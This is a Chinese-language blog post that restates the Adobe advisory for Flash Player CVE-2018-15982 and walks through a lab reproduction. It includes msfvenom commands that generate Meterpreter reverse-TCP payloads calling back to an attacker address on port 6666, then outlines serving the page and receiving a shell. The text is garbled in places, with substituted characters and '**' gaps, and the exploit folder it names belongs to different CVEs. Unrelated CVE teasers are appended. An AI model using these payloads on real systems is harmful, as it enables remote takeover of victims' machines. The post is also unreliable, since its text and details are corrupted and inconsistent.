漏洞資訊:cve-2018-15982
adobe已發布適用於windows,macos,linux和chrome os的adobe flash player安全更新。這些更新解決乙個 關鍵的 adobe flash player的漏洞和乙個 重要的 adobe flash player的安裝程式的漏洞。成功利用可能導致當前使用者的上下文中的任意**執行和許可權提公升。
cvssv3分數和漏洞型別:
受cve-2018-15982影響的產品
產品
版
平台
adobe flash player桌面執行時
31.0.0.153及更早版本
windows,macos和linux
適用於google chrome的adobe flash player
31.0.0.153及更早版本
windows,macos,linux和chrome os
適用於microsoft edge和internet explorer 11的adobe flash player
31.0.0.153及更早版本
windows 10和8.1和win7/其他版本為測試
adobe flash player安裝程式
08.0.0.108及更早版本
視窗漏洞危害:
漏洞類別
漏洞影響
嚴重
cve編號
免費使用
任意**執行
危急cve-2018-15982
修復方法:對adb flash進行公升級
產品
版
平台
優先
可用性
adobe flash player桌面執行時
32.0.0.101
windows,macos
1flash player分發
適用於google chrome的adobe flash player
32.0.0.101
windows,macos,linux和chrome os
1谷歌chrome發布
適用於microsoft edge和internet explorer 11的adobe flash player
32.0.0.101
windows 10和8.1
1microsoft安全通報
adobe flash player桌面執行時
32.0.0.101
linux的
3adobe flash player安裝程式
31.0.0.122視窗2
flash player分發
實驗環境
攻擊機:kali 2.0使用工具受害機:win7 win10
cve-2018-0802_cve-2017-11882-master exp1.建立payload程式msfconsole
msfvenom -p windows/meterpreter/reverse_tcp_rc4 rc4password=zale lport=6666 lhost=192.168.0.111 -f raw>86.bin這裡會生成兩個bin檔案,分別為86bin和64bin估計是32位平台和64位平台msfvenom -p windows/meterpreter/reverse_tcp_rc4 rc4password=zale lport=6666 lhost=192.168.0.111 -f raw>64.bin
監聽payload
開啟apache服務
發給受害機驗證是否成功
當受害者點選網頁時
可用清楚看到已經成功返回shell
漏洞復現 CVE 2019 0708 漏洞利用
2019年5月14日微軟官方發布安全補丁,修復了windows遠端桌面服務的遠端 執行漏洞,該漏洞影響了某些舊版本的windows系統。此漏洞是預身份驗證且無需使用者互動,這就意味著這個漏洞可以通過網路蠕蟲的方式被利用。利用此漏洞的任何惡意軟體都可能從被感染的計算機傳播到其他易受攻擊的計算機,其方式...
漏洞復現 CVE 2020 1938漏洞復現
tomcat connector 是 tomcat 與外界連線的通道,使得它與 catalina 能夠接收外部的請求,傳遞給對應的 web 應用程式處理,並返回對應的請求結果。http connector就是用來提供經常用到的http web服務,而ajp connector使用的ajp協議 apa...
CVE 2019 14287 漏洞復現
etc sudoers檔案配置不當,導致使用者可以繞過安全策略,以root身份執行命令。預設情況下的linux,不會遭受此攻擊 開啟linux中 etc sudoers,預設情況下如下圖所示。這是什麼意思呢?如果這樣配置,就允許test使用者以非root使用者之外的所有使用者許可權執行id這個命令。...